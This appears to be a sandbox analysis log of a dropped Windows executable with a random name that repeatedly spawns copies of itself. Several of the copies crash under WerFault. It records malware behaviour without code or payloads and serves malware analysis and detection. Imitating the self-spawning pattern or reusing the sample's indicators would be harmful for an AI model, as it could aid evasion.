C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe"C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe"2⤵
- Executes dropped EXE
PID:980 -
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4648
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4724
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4968
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4332
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4632
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4996
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:3960
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:752
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:312
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:5288
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:5624
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:5940
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4320
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:6008
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:3456
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:6008
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:5340
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:6292
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:6904
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4316
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:1628
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7020
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4656
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7196
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7572
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7904
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4548
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:5688
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7632
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 244⤵
- Program crash
PID:7560
-
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:8168
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:3576
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:8228
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:8672
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:8984
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:8524
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:5220
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:8580
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4772
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:3192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 244⤵
- Program crash
PID:8160
-
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:8092
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9240
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9640
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9964
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7236
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9680
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9556
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10128
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9388
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:1996
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:3360
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10456
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10932 -s 244⤵
- Program crash
PID:1492
-
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10408
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:6692
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11244
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10248
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:6212
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 244⤵
- Program crash
PID:3632
-
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10348
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7560
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7416
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11504
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12024
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:2308
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:8544
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11628
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:2652
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11428
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12644
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:13212
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12996
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12536
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:13536
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:13900
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12588
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:13732
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9828 -s 244⤵
- Program crash
PID:14040
-
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11772
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:14284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14284 -s 244⤵
- Program crash
PID:12528
-
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:13868
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:13992
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11852
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11500
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:14556
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:14952
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15348
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12712 -s 244⤵
- Program crash
PID:15068
-
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15264
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:14712
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11972
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15128
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:14884
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:8628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8628 -s 244⤵
- Program crash
PID:15472
-
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15396
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15784
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15896
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16004
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:14352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14352 -s 244⤵
- Program crash
PID:16812
-
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16012
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16712
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:17116
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:14552
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:13876
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16996
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10368
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:17124
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:17276
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10200
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16584
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:17600
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:17968
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11944
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16448
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7260
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16348
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:17672
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15712
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12732
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9596
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15248
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15340
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:6812
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16532
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9832
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:18544
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:18816
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19388
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:18080
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:18052
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19364
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15908
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19444
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:7432
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19468
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19896
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16028
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11520
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19656
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11176
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19164
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:18840
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16672
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19012
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:18760
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16732
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19200
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:20716
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:21204
-
-
